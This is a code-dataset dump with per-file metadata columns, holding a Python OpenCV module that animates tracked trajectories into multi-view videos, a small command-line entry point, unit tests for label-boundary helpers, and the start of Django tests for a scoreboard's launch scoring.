hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
04a5738f5941bb866cbbef1e059424bd9bfa34f6 | 16,267 | py | Python | fly_plot_lib/animate_cv.py | ROB7-StayHumble/multi_tracker | 1c56650f2af00b84a0cd0f95392727026eae12ce | [
"MIT"
] | null | null | null | fly_plot_lib/animate_cv.py | ROB7-StayHumble/multi_tracker | 1c56650f2af00b84a0cd0f95392727026eae12ce | [
"MIT"
] | null | null | null | fly_plot_lib/animate_cv.py | ROB7-StayHumble/multi_tracker | 1c56650f2af00b84a0cd0f95392727026eae12ce | [
"MIT"
] | null | null | null | import numpy as np
import cv2
import matplotlib
import matplotlib.pyplot as plt
import time
NAN = np.nan
def draw_cv_trajectory(img, x, y, color, thickness):
    # The line-segment version is kept for reference but disabled; the
    # per-point circles below are what actually render the trajectory.
    if 0:
        for i in range(len(x)-3):
            try:
                cv2.line(img, (int(x[i]), int(y[i])), (int(x[i+1]), int(y[i+1])), color[i].tolist(), thickness)
            except Exception:
                print('could not draw trajectory line, length pts: ', len(x), 'i: ', i)
    for i in range(len(x)):
        cv2.circle(img, (x[i], y[i]), 1, color=color[i].tolist(), thickness=-1)
def get_indices(x, y, xmesh, ymesh, radius=1, colors=None):
    # Keep only finite (non-NaN) values, then map each value to the index of
    # the nearest mesh point. Note that x and y are filtered independently,
    # which assumes NaN padding occurs at the same positions in both arrays.
    x = x[np.isfinite(x)]
    y = y[np.isfinite(y)]
    ix = [np.argmin(np.abs(xmesh - xval)) for xval in x]
    iy = [np.argmin(np.abs(ymesh - yval)) for yval in y]
'''
ix_enlarged = []
iy_enlarged = []
if colors is not None:
colors_enlarged = []
for n, i in enumerate(ix):
min_i = np.max([0, i-radius])
max_i = np.min([len(xmesh), i+radius])
a = np.arange(min_i, max_i)
ix_enlarged.extend(a)
if colors is not None:
colors_enlarged.extend([colors[n]]*len(a))
for i in iy:
min_i = np.max([0, i-radius])
max_i = np.min([len(ymesh), i+radius])
a = np.arange(min_i, max_i)
iy_enlarged.extend(a)
#if len(ix) == 1:
# return ix[0], iy[0]
#else:
if colors is None:
return ix_enlarged, iy_enlarged
else:
return ix_enlarged, iy_enlarged, colors_enlarged
'''
return ix, iy
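# Illustrative example (values assumed for this note, not taken from the
# original project): with xmesh = np.arange(0, 1, 0.005), a point at
# x = 0.25 maps to index 50, because xmesh[50] == 0.25 is the nearest
# mesh value.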
def synchronize_frames(x, y, sync_frames, padval=NAN, colors=None, n_frames_before_sync_to_show='all'):
xsync = []
ysync = []
if colors is not None:
colors_sync = []
largest_sync_frame = np.max(sync_frames)
for i, xi in enumerate(x):
padding = [padval]*(largest_sync_frame - sync_frames[i])
xsync.append( np.hstack((padding, x[i])) )
ysync.append( np.hstack((padding, y[i])) )
if colors is not None:
colors_sync.append( np.hstack((padding, colors[i])) )
# pad back
lengths = [len(x) for x in xsync]
length_of_longest_sequence = np.max(lengths)
for i, xi in enumerate(xsync):
padding = [padval]*(length_of_longest_sequence - len(xi))
xsync[i] = np.hstack((xsync[i], padding))
ysync[i] = np.hstack((ysync[i], padding))
if colors is not None:
colors_sync[i] = np.hstack((colors_sync[i], padding))
if n_frames_before_sync_to_show != 'all':
first_frame = largest_sync_frame - n_frames_before_sync_to_show
for i, xi in enumerate(xsync):
xsync[i] = xsync[i][first_frame:]
ysync[i] = ysync[i][first_frame:]
if colors is not None:
colors_sync[i] = colors_sync[i][first_frame:]
if colors is None:
return xsync, ysync
else:
return xsync, ysync, colors_sync
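# Worked sketch of what synchronize_frames does (illustrative values only,
# assumed for this example). Trajectories are front-padded with NaN so their
# sync frames line up, then back-padded to a common length:
#
#   x = [np.array([1., 2., 3.]), np.array([4., 5.])]
#   y = [np.array([1., 2., 3.]), np.array([4., 5.])]
#   xs, ys = synchronize_frames(x, y, sync_frames=[2, 0])
#   # xs[0] -> [ 1.,  2.,  3., nan]   (already at latest sync frame; back-padded)
#   # xs[1] -> [nan, nan,  4.,  5.]   (front-padded by 2 frames)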
def animate_matrix_2views(x, y, z,
colors=None,
xlim=[0,1],
ylim=[0,1],
zlim=[0,1],
resolution=0.005,
filename='',
sync_frames=[],
framerate=100,
ghost_tail=20,
radius=2,
artist_function_xy=None,
artist_function_xz=None,
colormap='hot',
colornorm=[0,1],
n_frames_before_sync_to_show='all'):
def stack_mats(mat_xy, mat_xz):
# add border to mats
mat_xy[:,0,:] = 0
mat_xy[:,-1,:] = 0
mat_xy[0,:,:] = 0
mat_xy[-1,:,:] = 0
mat_xz[:,0,:] = 0
mat_xz[:,-1,:] = 0
mat_xz[0,:,:] = 0
mat_xz[-1,:,:] = 0
mat = np.vstack((mat_xy, mat_xz))
return mat
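    # Layout of the stacked array (assumed illustration): the x-y view sits
    # on top of the x-z view, sharing the x axis; the whole frame is flipped
    # vertically with np.flipud before being written, so y/z increase upward
    # in the final video.
    #
    #   +----------+
    #   |   x-y    |
    #   +----------+
    #   |   x-z    |
    #   +----------+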
xmesh = np.arange(xlim[0], xlim[1], resolution)
ymesh = np.arange(ylim[0], ylim[1], resolution)
zmesh = np.arange(zlim[0], zlim[1], resolution)
mat_xy = np.ones([len(ymesh), len(xmesh), 3], dtype=np.uint8)
mat_xy *= 255
mat_xz = np.ones([len(zmesh), len(xmesh), 3], dtype=np.uint8)
mat_xz *= 255
kernel = np.ones((5,5),np.uint8)
norm = matplotlib.colors.Normalize(colornorm[0], colornorm[1])
color_mappable = matplotlib.cm.ScalarMappable(norm, plt.get_cmap(colormap))
    print('synchronizing trajectories')
if colors is None:
xsync, ysync = synchronize_frames(x, y, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync = synchronize_frames(x, z, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
else:
xsync, ysync, colors_sync = synchronize_frames(x, y, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync, colors_sync = synchronize_frames(x, z, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
colors_sync = np.array(colors_sync)
#this works:
#writer = cv2.VideoWriter(filename,cv.CV_FOURCC('P','I','M','1'),sampleRate,(panelsFrames.shape[1],panelsFrames.shape[0]),True) # works for Linux
# but this works better:
    print('initializing writer')
mat = stack_mats(mat_xy, mat_xz)
writer = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('m','p','4','v'),framerate,(mat.shape[1], mat.shape[0]),True) # works on Linux and Windows
    print(filename)
nframes = len(xsync[0])
for frame in range(2,nframes):
        s = str(frame) + ' of ' + str(nframes)
        print(s)
mat_xy[:,:,:] = 255
mat_xz[:,:,:] = 255
if artist_function_xy is not None:
mat_xy = artist_function_xy(mat_xy)
if artist_function_xz is not None:
mat_xz = artist_function_xz(mat_xz)
first_frame = np.max([0, frame-ghost_tail])
last_frame = frame
x = xsync[:, first_frame:last_frame]
y = ysync[:, first_frame:last_frame]
z = zsync[:, first_frame:last_frame]
#alpha = np.arange(first_frame, last_frame).reshape(1,last_frame-first_frame).astype(np.float32)
#alpha /= float(last_frame)
#alpha *= 255
#alpha = alpha.astype(np.uint8)
#alpha = np.repeat(alpha, len(x), axis=0)
x = np.reshape(x, x.shape[0]*x.shape[1])
y = np.reshape(y, y.shape[0]*y.shape[1])
z = np.reshape(z, z.shape[0]*z.shape[1])
#alpha = np.reshape(alpha, alpha.shape[0]*alpha.shape[1])
if colors is not None:
c = colors_sync[:, first_frame:last_frame]
c = np.reshape(c, c.shape[0]*c.shape[1])
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
#rgba[:,3] = alpha
#print rgba
        if len(x) > 1:
            # Both branches of the original colors-is-None check were
            # identical, so the index lookup is done once. Note that the draw
            # calls below use rgba, which is only defined when colors is
            # given, so this function effectively requires colors.
            indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
            indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
# draw the ghost tails
draw_cv_trajectory(mat_xy, indicesx, indicesy, rgba, 1)
draw_cv_trajectory(mat_xz, indicesx, indicesz, rgba, 1)
# draw the points as circles
if 1:
x = xsync[:, last_frame]
y = ysync[:, last_frame]
z = zsync[:, last_frame]
c = colors_sync[:, last_frame]
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
            for i in range(len(x)):
                try:
                    cv2.circle(mat_xy, (indicesx[i], indicesy[i]), 5, color=rgba[i].tolist(), thickness=-1)
                    cv2.circle(mat_xz, (indicesx[i], indicesz[i]), 5, color=rgba[i].tolist(), thickness=-1)
                except IndexError:
                    # NaN-padded entries are dropped by get_indices, so the
                    # index lists can be shorter than x; skip those points.
                    pass
mat = stack_mats(mat_xy, mat_xz)
matflipped = np.array(np.flipud(mat))
writer.write(matflipped)
        del x, y, z
writer.release()
def animate_matrix_3views(x, y, z,
colors=None,
xlim=[0,1],
ylim=[0,1],
zlim=[0,1],
resolution=0.005,
filename='',
sync_frames=[],
framerate=100,
ghost_tail=20,
radius=2,
artist_function_xy=None,
artist_function_xz=None,
artist_function_yz=None,
colormap='hot',
colornorm=[0,1],
n_frames_before_sync_to_show='all'):
def stack_mats(mat_xy, mat_xz, mat_yz):
# add border to mats
mat_xy[:,0,:] = 0
mat_xy[:,-1,:] = 0
mat_xy[0,:,:] = 0
mat_xz[:,0,:] = 0
mat_xz[:,-1,:] = 0
mat_xz[0,:,:] = 0
mat_xz[-1,:,:] = 0
mat_yz[:,-1,:] = 0
mat_yz[0,:,:] = 0
mat_yz[-1,:,:] = 0
# blank mat
mat_blank = np.ones_like(mat_yz)*255
mat_x_stack = np.vstack((mat_xy, mat_xz))
mat_yz_stack = np.vstack((mat_blank, mat_yz))
mat = np.hstack((mat_x_stack, mat_yz_stack))
return mat
xmesh = np.arange(xlim[0], xlim[1], resolution)
ymesh = np.arange(ylim[0], ylim[1], resolution)
zmesh = np.arange(zlim[0], zlim[1], resolution)
mat_xy = np.ones([len(ymesh), len(xmesh), 3], dtype=np.uint8)
mat_xy *= 255
mat_xz = np.ones([len(zmesh), len(xmesh), 3], dtype=np.uint8)
mat_xz *= 255
mat_yz = np.ones([len(ymesh), len(zmesh), 3], dtype=np.uint8)
mat_yz *= 255
kernel = np.ones((5,5),np.uint8)
norm = matplotlib.colors.Normalize(colornorm[0], colornorm[1])
color_mappable = matplotlib.cm.ScalarMappable(norm, plt.get_cmap(colormap))
    print('synchronizing trajectories')
if colors is None:
xsync, ysync = synchronize_frames(x, y, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync = synchronize_frames(x, z, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
else:
xsync, ysync, colors_sync = synchronize_frames(x, y, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync, colors_sync = synchronize_frames(x, z, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
colors_sync = np.array(colors_sync)
#this works:
#writer = cv2.VideoWriter(filename,cv.CV_FOURCC('P','I','M','1'),sampleRate,(panelsFrames.shape[1],panelsFrames.shape[0]),True) # works for Linux
# but this works better:
    print('initializing writer')
mat = stack_mats(mat_xy, mat_xz, mat_yz)
writer = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('m','p','4','v'),framerate,(mat.shape[1], mat.shape[0]),True) # works on Linux and Windows
    print(filename)
nframes = len(xsync[0])
for frame in range(2,nframes):
        s = str(frame) + ' of ' + str(nframes)
        print(s)
mat_xy[:,:,:] = 255
mat_xz[:,:,:] = 255
mat_yz[:,:,:] = 255
if artist_function_xy is not None:
mat_xy = artist_function_xy(mat_xy)
if artist_function_xz is not None:
mat_xz = artist_function_xz(mat_xz)
if artist_function_yz is not None:
mat_yz = artist_function_yz(mat_yz)
first_frame = np.max([0, frame-ghost_tail])
last_frame = frame
x = xsync[:, first_frame:last_frame]
y = ysync[:, first_frame:last_frame]
z = zsync[:, first_frame:last_frame]
#alpha = np.arange(first_frame, last_frame).reshape(1,last_frame-first_frame).astype(np.float32)
#alpha /= float(last_frame)
#alpha *= 255
#alpha = alpha.astype(np.uint8)
#alpha = np.repeat(alpha, len(x), axis=0)
x = np.reshape(x, x.shape[0]*x.shape[1])
y = np.reshape(y, y.shape[0]*y.shape[1])
z = np.reshape(z, z.shape[0]*z.shape[1])
#alpha = np.reshape(alpha, alpha.shape[0]*alpha.shape[1])
if colors is not None:
c = colors_sync[:, first_frame:last_frame]
c = np.reshape(c, c.shape[0]*c.shape[1])
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
#rgba[:,3] = alpha
#print rgba
        if len(x) > 1:
            # As in the two-view version, both branches of the original
            # colors-is-None check were identical; rgba below still requires
            # colors to be given.
            indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
            indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
# draw the ghost tails
draw_cv_trajectory(mat_xy, indicesx, indicesy, rgba, 1)
draw_cv_trajectory(mat_xz, indicesx, indicesz, rgba, 1)
draw_cv_trajectory(mat_yz, indicesy, indicesz, rgba, 1)
# draw the points as circles
if 1:
x = xsync[:, last_frame]
y = ysync[:, last_frame]
z = zsync[:, last_frame]
c = colors_sync[:, last_frame]
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
            for i in range(len(x)):
                try:
                    cv2.circle(mat_xy, (indicesx[i], indicesy[i]), 5, color=rgba[i].tolist(), thickness=-1)
                    cv2.circle(mat_xz, (indicesx[i], indicesz[i]), 5, color=rgba[i].tolist(), thickness=-1)
                    cv2.circle(mat_yz, (indicesy[i], indicesz[i]), 5, color=rgba[i].tolist(), thickness=-1)
                except IndexError:
                    # Skip points whose NaN-padded coordinates were dropped
                    # by get_indices.
                    pass
mat = stack_mats(mat_xy, mat_xz, mat_yz)
matflipped = np.array(np.flipud(mat))
writer.write(matflipped)
        del x, y, z
writer.release()
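if __name__ == '__main__':
    # Minimal usage sketch, not part of the original module: every value
    # below (trajectories, filename, framerate) is an assumption chosen for
    # illustration. Two synthetic trajectories are animated into a two-view
    # (x-y over x-z) video.
    t = np.linspace(0.0, 1.0, 200)
    x = [0.5 + 0.3 * np.cos(4 * np.pi * t), 0.5 + 0.2 * np.sin(4 * np.pi * t)]
    y = [0.5 + 0.3 * np.sin(4 * np.pi * t), 0.5 * np.ones_like(t)]
    z = [t, 1.0 - t]
    colors = [t, t]  # mapped through the 'hot' colormap over colornorm
    animate_matrix_2views(x, y, z,
                          colors=colors,
                          filename='demo.mp4',
                          sync_frames=[0, 0],
                          framerate=30,
                          colornorm=[0, 1])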
| 39.009592 | 151 | 0.530522 | 2,134 | 16,267 | 3.861762 | 0.09044 | 0.033976 | 0.033127 | 0.04332 | 0.83849 | 0.820531 | 0.794564 | 0.774178 | 0.766776 | 0.759495 | 0 | 0.023876 | 0.340874 | 16,267 | 416 | 152 | 39.103365 | 0.74473 | 0.077334 | 0 | 0.78169 | 0 | 0 | 0.012039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010563 | 0.017606 | null | null | 0.03169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8e12a0d006fc0ede1083a8b0339435a5b56ced07 | 47 | py | Python | pythonapp/command_line.py | LinodeContent/pythonapp-example | 44ce68236043ee7e8bc97f2677cfa147622557e7 | [
"MIT"
] | null | null | null | pythonapp/command_line.py | LinodeContent/pythonapp-example | 44ce68236043ee7e8bc97f2677cfa147622557e7 | [
"MIT"
] | null | null | null | pythonapp/command_line.py | LinodeContent/pythonapp-example | 44ce68236043ee7e8bc97f2677cfa147622557e7 | [
"MIT"
] | null | null | null | from . import msg
def main():
print(msg())
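# Hedged aside: a command_line module exposing main() like this is the usual
# target of a setuptools console-script entry point. A hypothetical
# declaration (not verified against this repo's setup.py) would be:
#
#   entry_points={
#       'console_scripts': ['pythonapp = pythonapp.command_line:main'],
#   }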
| 6.714286 | 17 | 0.595745 | 7 | 47 | 4 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234043 | 47 | 6 | 18 | 7.833333 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e3a4d34f659977279caee4309f65a7b29ecbf0e | 2,059 | py | Python | tests/test_utils.py | Andolab/miNER | 4871fce8907a554734e0e70aea33e2adf03c0ce1 | [
"MIT"
] | 3 | 2019-04-06T03:14:01.000Z | 2020-12-14T09:29:58.000Z | tests/test_utils.py | Andolab/miNER | 4871fce8907a554734e0e70aea33e2adf03c0ce1 | [
"MIT"
] | 1 | 2019-01-25T07:52:22.000Z | 2019-03-29T14:38:06.000Z | tests/test_utils.py | Andolab/miNER | 4871fce8907a554734e0e70aea33e2adf03c0ce1 | [
"MIT"
] | 1 | 2019-01-25T08:07:35.000Z | 2019-01-25T08:07:35.000Z | import unittest
from miner.utils import is_begin_of_label, is_end_of_label
class TestUtils(unittest.TestCase):
def test__is_end_of_label(self):
labels = ["B", "I", "O", "S", "B", "I", "I", "E", "O", "O", "B", "B"]
self.assertFalse(is_end_of_label(labels[0], labels[1], "a", "a"))
self.assertTrue(is_end_of_label(labels[1], labels[2], "a", "a"))
self.assertFalse(is_end_of_label(labels[2], labels[3], "a", "a"))
self.assertTrue(is_end_of_label(labels[3], labels[4], "a", "a"))
self.assertFalse(is_end_of_label(labels[4], labels[5], "a", "a"))
self.assertFalse(is_end_of_label(labels[5], labels[6], "a", "a"))
self.assertFalse(is_end_of_label(labels[6], labels[7], "a", "a"))
self.assertTrue(is_end_of_label(labels[7], labels[8], "a", "a"))
self.assertFalse(is_end_of_label(labels[8], labels[9], "a", "a"))
self.assertFalse(is_end_of_label(labels[9], labels[10], "a", "a"))
self.assertTrue(is_end_of_label(labels[10], labels[11], "a", "a"))
self.assertTrue(is_end_of_label(labels[11], "", "a", ""))
self.assertTrue(is_end_of_label("B", "I", "a", "b"))
def test__is_begin_of_label(self):
labels = ["B", "I", "O", "S", "B", "I", "I", "E", "O", "O", "B", "B"]
self.assertTrue(is_begin_of_label(labels[0], "a", "a"))
self.assertFalse(is_begin_of_label(labels[2], "a", "a"))
self.assertTrue(is_begin_of_label(labels[3], "a", "a"))
self.assertTrue(is_begin_of_label(labels[4], "a", "a"))
self.assertFalse(is_begin_of_label(labels[5], "a", "a"))
self.assertFalse(is_begin_of_label(labels[6], "a", "a"))
self.assertFalse(is_begin_of_label(labels[7], "a", "a"))
self.assertFalse(is_begin_of_label(labels[8], "a", "a"))
self.assertFalse(is_begin_of_label(labels[9], "a", "a"))
self.assertTrue(is_begin_of_label(labels[10], "a", "a"))
self.assertTrue(is_begin_of_label(labels[11], "a", "a"))
self.assertTrue(is_begin_of_label("I", "a", "b"))
| 52.794872 | 77 | 0.606119 | 328 | 2,059 | 3.527439 | 0.112805 | 0.175454 | 0.258427 | 0.155575 | 0.876404 | 0.853933 | 0.853933 | 0.727744 | 0.701815 | 0.057044 | 0 | 0.023529 | 0.174356 | 2,059 | 38 | 78 | 54.184211 | 0.657059 | 0 | 0 | 0.0625 | 0 | 0 | 0.036911 | 0 | 0 | 0 | 0 | 0 | 0.78125 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d0399aac2b1f3d19936e1601744effc166e9e90 | 99,766 | py | Python | workspace/ms/scoreboard/tests/test_launch.py | jawaad-ahmad/brata.masterserver | 9fea1aa369fbdc56f0d9b3133bac2f3861e25ae2 | [
"Apache-2.0"
] | 1 | 2015-12-05T05:13:16.000Z | 2015-12-05T05:13:16.000Z | workspace/ms/scoreboard/tests/test_launch.py | jawaad-ahmad/brata.masterserver | 9fea1aa369fbdc56f0d9b3133bac2f3861e25ae2 | [
"Apache-2.0"
] | 64 | 2015-08-27T06:04:38.000Z | 2016-05-04T04:16:53.000Z | workspace/ms/scoreboard/tests/test_launch.py | jawaad-ahmad/brata.masterserver | 9fea1aa369fbdc56f0d9b3133bac2f3861e25ae2 | [
"Apache-2.0"
] | 2 | 2015-08-26T00:59:59.000Z | 2015-08-26T15:20:08.000Z | from django.test import TestCase
from django.utils.timezone import utc
from datetime import datetime
import logging
import mock
from dbkeeper.models import Organization, Team, Setting
from piservice.models import PiStation, PiEvent
import scoreboard.views as target
def _mocked_utcNow():
return datetime(2001, 1, 1, 0, 0, 0).replace(tzinfo=utc)
class ScoreboardStatusLaunchTestCase(TestCase):
def _setUpStations(self):
self.launchStation = PiStation.objects.create(
station_type = PiStation.LAUNCH_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.dockStation = PiStation.objects.create(
station_type = PiStation.DOCK_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.secureStation = PiStation.objects.create(
station_type = PiStation.SECURE_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.returnStation = PiStation.objects.create(
station_type = PiStation.RETURN_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.station = self.launchStation
def _setUpTeams(self):
org = Organization.objects.create(
name = "School 1",
type = Organization.SCHOOL_TYPE
)
self.team1Name = "Team 1"
self.team1 = Team.objects.create(
name = self.team1Name,
organization = org
)
def _setUpEvents(self):
# Some tests don't need these events. If not needed for a particular
# test, use PiEvent.objects.all().delete()
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 0, 0).replace(tzinfo=utc),
type = PiEvent.EVENT_STARTED_MSG_TYPE
)
def _verify(self,
expectedScore,
expectedDuration_s):
actual = target._recomputeTeamScore(self.team1Name)
actualScore = actual['launch_score']
actualDuration_s = actual['launch_duration_s']
self.assertEqual(expectedScore, actualScore)
self.assertEqual(expectedDuration_s, actualDuration_s)
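    # Scoring convention implied by the expectations in the tests below:
    # 1 point for the START_CHALLENGE event, plus 2 per successful SUBMIT and
    # 1 per failed SUBMIT; the duration runs from START_CHALLENGE until the
    # concluding event (or "now"), and a 4th submit stops the clock early.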
def setUp(self):
PiEvent._meta.get_field("time").auto_now_add = False
self._serialNum = 1
self._setUpStations()
self._setUpTeams()
self._setUpEvents()
def test_recomputeLaunchScore_noEvents(self):
PiEvent.objects.all().delete()
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
    def test_recomputeLaunchScore_noEventStartedEvent(self, mock_utcNow):
PiEvent.objects.all().delete()
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
    def test_recomputeLaunchScore_eventsBeforeEventStartedEvent(self, mock_utcNow):
